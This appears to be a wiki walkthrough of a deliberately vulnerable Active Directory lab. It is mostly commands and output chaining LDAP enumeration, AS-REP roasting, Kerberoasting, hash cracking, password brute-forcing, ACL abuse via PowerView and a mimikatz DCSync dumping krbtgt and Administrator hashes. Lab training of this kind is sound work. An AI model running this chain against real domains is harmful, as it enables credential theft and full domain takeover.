Writeup - WaterExecution/vulnerable-AD-plus GitHub Wiki
ldapsearch -h 10.10.10.100 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=change,DC=me
namingcontexts: CN=Configuration,DC=change,DC=me
namingcontexts: CN=Schema,CN=Configuration,DC=change,DC=me
namingcontexts: DC=DomainDnsZones,DC=change,DC=me
namingcontexts: DC=ForestDnsZones,DC=change,DC=me
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i description
Output:
...
description: New user generated password: =W{Z5FM
description: Company default password(Reset ASAP)
...
ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i "description: New" -A 23
Output:
description: New user generated password: i+7UKY;
...
sAMAccountName: jessika.luella
Get the accounts that have the DONT_REQ_PREAUTH attribute set (Kerberos pre-authentication not required):
GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/
Output:
python3 GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC
------------ --------------------------------------------- -------------------------- -------------------------- --------
doreen.elana CN=Senior management,CN=Users,DC=change,DC=me 2021-09-03 21:00:43.942822 2021-09-05 15:19:18.781665 0x400200
debbie.alfie CN=Accounting,CN=Users,DC=change,DC=me 2021-09-03 21:00:43.991219 2021-09-05 15:18:52.978908 0x400200
[email protected]:ca0087b7b39a3351c9583e5828bcf660$9af3abd666a9e17d97a49ebf807584ffcf75af607e2b2c4bf62f7be308206831ba2e8e6e34ce14f88f7986438223d29e2420ddbd41a751a35da5d0c41ceeb28ee6f02d03bc21832ac5b500dbe7cb3d80dd4ebaefcf223c0b4dc8ea8a16e36a6dbeb71eb9fe7229c19b8b0f94626ab88431862845c481ed81c10a8315eb762156136b37309c17bd32c50105f9ed5c84bb7f2d6e21e0b82a79128d685080eb0eeeda8a160222db98bd78051899416f917d03ebf415800d08f26d89bf185868f63f526d1ffb7e1e4e3e42f5e0adfebfc1a0ff3a6b3a19d75fa31ec6ba09eef139cacfcc0299aaea
[email protected]:69437ad0022d1fceba798239434420f3$4d8c41a002e383c5d38b136bbf46330e4a8132263f733094086982721826501ba8f68894fd0faff315ff2430d01afad02c7d71b926fe4303a67a2d92ea07044b63c964606d0f930e94c2747b06ae61fbb49bfa0b87b1b06cf7e172c81da99676590c9415d88ac946b6b3c9d361f493509e1816970ec460a3d40b5e4f6ff9bb4e3c5884b7057491ffb93fb2a96fdc116b353860924c66da1d5a52de40e3cfe76d13e9f436122c869e4fbbb364f1518b48bd75ee0a5611ab3cfd0ac3d60c5c82cdf9eff62fc2ed056e9f827a7aa9219762cf4e910269387374084c7e52c639c40ba042da2c33c8
GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/doreen.elana
Output:
GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/doreen.elana
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
Password:
[*] Cannot authenticate doreen.elana, getting its TGT
[email protected]:9fb4b16c4249adbe79033321da923d1f$7d716780c0ca219103000e9a4595c80435bfa9dcde4906625ae0a2f49ca75b8127a1223a79bd0bc2faad9722e4c4dcfe2f021dffb62c4568fcd0edfd2a9f55e9f77d090b1796686d01e9413467af060f11d8ac5193ab52759b8d3456fafc0320257b230650d0b1bd240b39a2533648522d76d8e6ae9456aa8515cfa48c6856882c17aee0f2d3058e48c8d75256af59f76659474417c4c6038cc15a9e7e17a3e0f1a60d66cd8ed3d867132d6718d7701d956b85bc8a312133429c23bc96535779acac8235e795cb8c200c97629ce7501e25639475f5360ea78336913f882f33fc56dfb2639313
For hashes produced by Rubeus, insert `$23` after the `$krb5asrep` prefix so the hash matches the format hashcat mode 18200 expects.
hashcat.exe -m 18200 -a 0 D:\hashes.txt D:\Wordlist\rockyou.txt
hashcat.exe -m 18200 -a 0 hashes.txt rockyou.txt
[email protected]:9fb4b16c4249adbe79033321da923d1f$7d716780c0ca219103000e9a4595c80435bfa9dcde4906625ae0a2f49ca75b8127a1223a79bd0bc2faad9722e4c4dcfe2f021dffb62c4568fcd0edfd2a9f55e9f77d090b1796686d01e9413467af060f11d8ac5193ab52759b8d3456fafc0320257b230650d0b1bd240b39a2533648522d76d8e6ae9456aa8515cfa48c6856882c17aee0f2d3058e48c8d75256af59f76659474417c4c6038cc15a9e7e17a3e0f1a60d66cd8ed3d867132d6718d7701d956b85bc8a312133429c23bc96535779acac8235e795cb8c200c97629ce7501e25639475f5360ea78336913f882f33fc56dfb2639313
:1992
doreen.elana:1992
ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i "company default password"
description: Company default password(Reset ASAP)
...
sAMAccountName: nichole.janelle
...
...
description: Company default password(Reset ASAP)
...
sAMAccountName: gavrielle.guinna
Create a password list.
echo "change" >> potential.txt
hashcat -a 6 potential.txt "?d?d?d" --force --stdout > password.txt
Using crackmapexec, you can brute-force either account with the password list.
cme smb 10.10.10.100 -u nichole.janelle -p password.txt
cme smb 10.10.10.100 -u Gavrielle.Guinna -p password.txt
SMB 10.10.10.100 445 DC [+] change.me\nichole.janelle:change132
SMB 10.10.10.100 445 DC [+] change.me\Gavrielle.Guinna:change132
ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i service
servicePrincipalName: mssql_svc/mssqlserver.change.me
servicePrincipalName: http_svc/httpserver.change.me
servicePrincipalName: exchange_svc/exserver.change.me
To use this account you will first need to reset its password (its description reads `description: New user generated password: =W{Z5FM`).
smbpasswd -r 10.10.10.100 -U 'jessika.luella'
GetUserSPNs.py -request -dc-ip 10.10.10.100 change.me/jessika.luella
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------- ------------ -------- -------------------------- --------- ----------
mssql_svc/mssqlserver.change.me mssql_svc 2021-06-16 23:28:33.186290 <never>
http_svc/httpserver.change.me http_svc 2021-06-07 22:42:54.144313 <never>
exchange_svc/exserver.change.me exchange_svc 2021-06-07 22:42:54.175986 <never>
$krb5tgs$23$*http_svc$CHANGE.ME$change.me/http_svc*$19f16990dec720eb65e2b788371bd87d$e9ede30981e8c512832deb5ad60719d5d0f72a2fa8c0d091d42f896cb9aa3dfde8e8c03ec0a637f
e0b16e969c157fc51b90b6f482b3a1006fe1649c06df17525c0fc79ebe53691914982c7fc431e8e1bbd4848ff21f37c6901c4732f51ae37848f2a36802518a60902f785a5e7d04c830cc3f27b031c37ebebc
5d29fe133ec57750e7ab108f0333ed101fa063b62f55ad9fc4ae757afad9ab54b66976840943d9f38f4a74b8d1c52ab3d5625c069ee9f72cbb046a7e2637fcf16989a990713871afe8c1d8877cda1dbd901c
27425630e1fbec72a3748652c003c4d28f706753194138bf45f64524fbd4ec2a5edbe6a75d6a929ddc563a11d87bf05d57e29543f01716a9064d813a92170d9aa167c8c69e49e915f49d67fe98673baa7426
16ce40dc7ffc4d8e9c609cfd2323958481942922d69a41b635a4c8b3994b1a3d4b985a298097bf55d64c351f10b3a0fed6e98235baf669c3a30ee18acac7cffd93587843e39bef05a2a3dd41fabe38b2efe9
a36791e809adf80cb5d10d014f34a54eeeade620d335a18e2ee0b6eb939ad47d272f0169b783980a817aff900fc4238fbb696578b6400a7ccaf2e4f64a55d10f6d2adb13ed9e32711ef4f3902e28afd0d338
1f825da24ed51580c6910cc40968596765bca0cc1adfd667292c57679a0b4bb65fa27fec70c2adfea5f29e4f0f0af9d7371086522220ad0ec1f17d4949bdd4907653c4f246350598bbf9f92249a18075b117
0558109707438364332196e774cedf0cef1137e7cd61dbb83296c4bda39c2e166b1450454b5d89ddb7f64674e6695be6e211b9ac9670be02a4b5e6cbf0f7e8f3ce3f89ebdaeb83e5fc4b16942ed8b5c53c02
74905610109edc12b5a5ff923c65b2e7371a1c378978ae4a81cc71b0490fe043c9d7edca4f0c7d530ac3214581c64c7dc6efafbd104c515564bf2e16a30dfe8d0055944f1dcd829ebe9c72cbfe8b5df79b3b
1deabe3743396d0a8ee291bb2379a5345e4859c50ed8bef07c528822588daebbf92aba7c3996d08b36b90b02b5b52946a56a4885eb9a3d8cc486a8df921037f0cd07bbf05e252a22030fd6a2a3b05d6a61da
877cc793f014ae3a12f60c05c531e3ae10a591bb68920a06627a0c4d0a6e9eeb6f83f31d96da757ab39985edc8f72584345a4bb45247d875b99220f37831406f9a8be817e59788d1f65d09ae4b68a7351db1
bafbcd905daa1be703690f39a9846b37050832a32189d31708a4b20ab9962664c748e8a846195a7f6c03d37fd5ff19e9b08e1a87f3aa0df621c9045735b278581b5b202032c5633f27c68f374776a9f1a919
93c2b37
hashcat.exe -m 13100 -a 0 hashes.txt password.txt
$krb5tgs$23$*http_svc$CHANGE.ME$change.me/http_svc*$afb105
fedd7b6bf5e44cdb9c926c23b6$80dac356f33a4f59bcaab494541e86a
7a4305bd55d6474c7f1e21d7dd0ab3841929d3ad5e081cd62cf964462c
1b95bae2876df643709afa701a69a2bc4be52158e52e45fcaa4641a06e
a74f5eb0a21d56c84542098629809529d378d8a98bf5686911e4942d0f
0a8d282ce9afa0bae2f1b70f580cfeaf2baca3b8fbbe8caa781f29031d
af74aebef5122ee7b7810465f6d8c764ff217fd7572e0d3d12a9d465818
df291d7aeabebcb501de79a46107b0ac345705e8a4ee271b5e5091e04ce
79287753939171d0258018afae691eb87b904d017249b7dcb37c2ccce76
9778ab54884df9c31447da2f48dd8e4c2eab1a261d214744a319d7d5100
798238d201af0016008f77cec049c1dfad1641df2e72e60dd3b495a34ab
194fdfcd4dc249a4e9b92bc4108230695eced5ee95506fdb550b1a4285f
a3cf0413073fbc626c1a53bfaac63c978ad6ee678a030bf596a3014337b
ee773e5e87c4937662dbd3e96b2bf468ab0b8965c8481f02b6f20b4f9f2
21dab91f3f466076d840179fdc882fb5fdb57535cc817a23d55f5e5ec94
39e625d6904754691e39b8eff13c12a0a6310c3a68878eb49ec6d88080c
b5029c827f29534c14f01f6d2080bb9996602960391babbbc3eec28cd81
293734284c0689115526b5454cbe949b1f69dceff586292e60ef2c4a838
ccd12cd1a68148be9c2560cc71c0074c9fdc94570e6ba4881fc2626ebc13
751efaa8338d6c49042a4ff1b725c0646c400511310f990aab3e826fb40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:mike
http_svc: mike
With the initial access, PowerView can be used to find the accounts that have directory replication rights, which are needed for DCSync. However, to gain access to those accounts some form of privilege escalation is needed, and BloodHound will help find a path.
Account from initial access:
description: Company default password(Reset ASAP)
sAMAccountName: nichole.janelle
evil-winrm -i 10.10.10.100 -u nichole.janelle -p change132
Use PowerView to see which accounts have directory replication rights:
upload PowerView.ps1
import-module .\PowerView.ps1
Get-ObjectACL "DC=change,DC=me" -ResolveGUIDs | ? {($_.ObjectAceType -match 'Replication-Get')}
Output:
AceQualifier : AccessAllowed
ObjectDN : DC=change,DC=me
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
SecurityIdentifier : S-1-5-21-899434533-4132491356-2237190077-1657
Convert the SID to an account name (this does not work for built-in accounts):
Get-ADUser -Identity S-1-5-21-899434533-4132491356-2237190077-1657
Output:
Filippa Claudina has directory replication rights.
DistinguishedName : CN=Filippa Claudina,CN=Users,DC=change,DC=me
Name : Filippa Claudina
ObjectGUID : 8aac2476-2c50-4e10-9487-2afae074f4c2
SamAccountName : filippa.claudina
SID : S-1-5-21-899434533-4132491356-2237190077-1657
Surname : Claudina
UserPrincipalName : [email protected]
sudo apt install neo4j
sudo neo4j console
Login to http://localhost:7474 (neo4j:neo4j)
*Prompt for password change*
./BloodHound --no-sandbox
Login with neo4j:password
https://github.com/BloodHoundAD/BloodHound
Run SharpHound.exe to collect information *(Disable Windows Defender)
upload SharpHound.exe
.\SharpHound.exe
download 0210912204149_BloodHound.zip
nichole.janelle has "WriteOwner" over filippa.claudina (replication account).
*If none of the accounts are linked, you may need to re-run the script until you get one.
Change nichole.janelle's rights from "Own" to "GenericAll"
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'change134' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('change.me\nichole.janelle', $SecPassword)
Set-DomainObjectOwner -Credential $Cred -Identity filippa.claudina -OwnerIdentity nichole.janelle
Add-DomainObjectAcl -Credential $Cred -TargetIdentity filippa.claudina -PrincipalIdentity nichole.janelle -Rights All
Log in to filippa.claudina
net user filippa.claudina 1234 /domain
evil-winrm -i 10.10.10.100 -u filippa.claudina -p 1234
upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" exit
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 31/8/2021 6:36:24 PM
Object Security ID : S-1-5-21-899434533-4132491356-2237190077-502
Object Relative ID : 502
Credentials:
Hash NTLM: 1904f1e6c79caf1a92aab3bc1215da5c
ntlm- 0: 1904f1e6c79caf1a92aab3bc1215da5c
lm - 0: 5281a28c7aa26b3ef017a47789107617
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/6/2021 10:14:55 PM
Object Security ID : S-1-5-21-899434533-4132491356-2237190077-500
Object Relative ID : 500
Credentials:
Hash NTLM: 92937945b518814341de3f726500d4ff